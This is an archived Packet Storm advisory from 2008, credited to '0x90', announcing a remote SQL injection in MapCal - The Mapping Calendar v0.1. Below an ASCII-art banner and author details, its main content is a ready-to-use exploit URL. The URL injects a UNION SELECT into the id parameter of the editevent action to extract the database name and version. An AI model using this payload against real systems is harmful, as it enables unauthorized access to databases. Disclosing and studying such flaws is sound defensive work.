mapcal-sql.txt

2008-09-22T00:00:00
ID PACKETSTORM:70189
Type packetstorm
Reporter Guns
Modified 2008-09-22T00:00:00

Description

                                        
                                            ` _____ ____ _____  
/ _ \ /\ /\ / _ \ / _ \  
| | | | \ \/ / ||_| | | | | |   
| | | | \ / \_ | | | | |   
| |_| | / \ __\ | | |_| |  
\_____/ / /\ \ |____/ \_____/  
\/ \/  
  
[~] MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection  
  
[~] Author: 0x90  
  
[~] HomePage: www.0x90.com.ar  
  
[~] Contact: Guns[at]0x90[dot]com[dot]ar  
  
[~] Script: MapCal - The Mapping Calendar  
  
[~] site: http://mapcal.sourceforge.net  
  
[~] Vulnerability Class: SQL Injection  
  
  
  
[~] Exploit:  
  
http://localhost/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events  
`